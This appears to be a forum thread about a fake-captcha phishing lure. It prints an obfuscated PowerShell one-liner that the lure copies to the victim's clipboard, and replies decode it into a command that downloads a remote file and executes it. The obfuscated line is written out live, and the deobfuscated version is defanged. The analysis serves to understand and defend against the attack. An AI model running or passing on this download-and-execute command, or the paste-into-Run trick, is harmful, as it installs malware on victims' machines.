Hi, we’re doing a write-up for a cybersecurity article - need some PowerShell experts to take a look at some code (we’re not versed at all in PowerShell) and let us know what they think.
Malicious email came into our honeypot this morning - linked to spoof website that asked us to complete a captcha that furtively copied PowerShell code to the clipboard. Spoof site then asked to hit Win+R and then Ctrl+V (so, basically, paste the code into the Run dialog)
If anyone can let us know what the code below does? - Thanks-
POWERSHELL "FUNCTION GO { &$JOO (&$GHJ '8898848.8818859.1881883.38887/87.8j88pg'.replace('8','')) };$SKK='SGDHDYEJHDIDCXMKDJDSRFG';$GHJ=$SKK[10]+$SKK[20]+$SKK[14];$JOO=$SKK[10]+$SKK[6]+$SKK[13]; GO"
The function uses Invoke-Expression to run the string data in the file 7.jpg file which is downloaded using Invoke-RestMethod
It uses basic obfuscation to hide what it’s doing:
It obfuscates the URI by padding the IP address and filename with 8s. These are replaced to give the URI: 94[.]159[.]113[.]37/7.jpg
It obfuscates the commands by using variables in the function. The values for the variables $JOO and $GHJ are aliases for Invoke-Expression and Invoke-RestMethod. The variables are populated by extracting the characters 10,6,13 (IEX) and 10,20,14 (IRM) from the string stored in the $SKK variable.
Because the variables are just strings, they have to be preceded by the ampersand to be executed as a command.
Unobfuscated, it would look like this (using square brackets to break the IP address to prevent accidental execution).
powershell "function GO { Invoke-Expression (Invoke-RestMethod 94[.]159[.]113[.]37/7.jpg) }; GO"
Ultimately, yes. The .jpg file it’s downloading is unlikely to be an image, it’ll be a string with more powershell commands in it. Those commands will be the ones that download and install any executables.
BleepingComputer.com has several good write-ups on it. The payload can actually change depending on whether you’re the target or not:
